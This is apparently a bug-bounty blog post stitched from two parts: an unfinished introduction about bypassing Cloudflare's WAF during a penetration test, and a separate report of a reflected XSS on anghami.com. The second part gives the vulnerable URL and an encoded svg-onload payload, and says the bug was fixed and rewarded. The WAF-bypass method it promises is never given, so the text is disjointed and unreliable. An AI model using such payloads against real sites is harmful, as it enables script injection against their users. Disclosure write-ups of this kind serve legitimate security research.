HOW I WAS BYPASSED CLOUDFLARE WAF

credit: cyberploit

Hey guys, I was doing Penetration testing for the private company. I am used to of manual testing instead of tools. At that time, the company had used Cloudflare WAF. As a penetration tester, you fill like your inputs are not working and you haven’t found a single bug. Your inputs are going to block by WAF.

xss at anghami.com

ifound xss at anghami.com here it is the details report link: https://www.openbugbounty.org/reports/927326/ effected page:https://anghami.com/openapp/?deeplink=anghami://song/45651752 poc: https://www.anghami.com/openapp/?deeplink=anghami://song/45651752″>xxx<svg%2Fonload%3Dconfirm%28%2Fzikads%2F%29> mypayload: “>xxx<svg%2Fonload%3Dconfirm%28%2Fzikads%2F%29> bug has been fixted what did i get ? 1 month of subscription which worth about 1$ as bounty πŸ˜€